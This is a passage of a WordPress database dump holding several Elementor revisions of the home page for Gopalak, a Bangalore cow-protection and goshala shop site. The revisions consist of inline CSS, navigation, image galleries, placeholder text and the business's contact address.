alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 18:02:46','2022-10-13 12:32:46','',1373,'https://gopalak.in/?p=1735',0,'revision','',0),(1737,1,'2022-10-13 18:08:34','2022-10-13 12:38:34','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 18:08:34','2022-10-13 12:38:34','',1373,'https://gopalak.in/?p=1737',0,'revision','',0),(1738,1,'2022-10-13 18:08:34','2022-10-13 12:38:34','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 18:08:34','2022-10-13 12:38:34','',1373,'https://gopalak.in/?p=1738',0,'revision','',0),(1739,1,'2022-10-13 18:08:35','2022-10-13 12:38:35','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 18:08:35','2022-10-13 12:38:35','',1373,'https://gopalak.in/?p=1739',0,'revision','',0),(1741,1,'2022-10-14 10:20:07','2022-10-14 04:50:07','','pexels-min-an-1455455','','inherit','open','closed','','pexels-min-an-1455455','','','2022-10-14 10:20:07','2022-10-14 04:50:07','',0,'https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455.jpg',0,'attachment','image/jpeg',0),(1742,1,'2022-10-14 10:20:18','2022-10-14 04:50:18','','pexels-roman-odintsov-8747798','','inherit','open','closed','','pexels-roman-odintsov-8747798','','','2022-10-14 10:20:18','2022-10-14 04:50:18','',0,'https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798.jpg',0,'attachment','image/jpeg',0),(1743,1,'2022-10-14 10:22:17','2022-10-14 04:52:17','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" 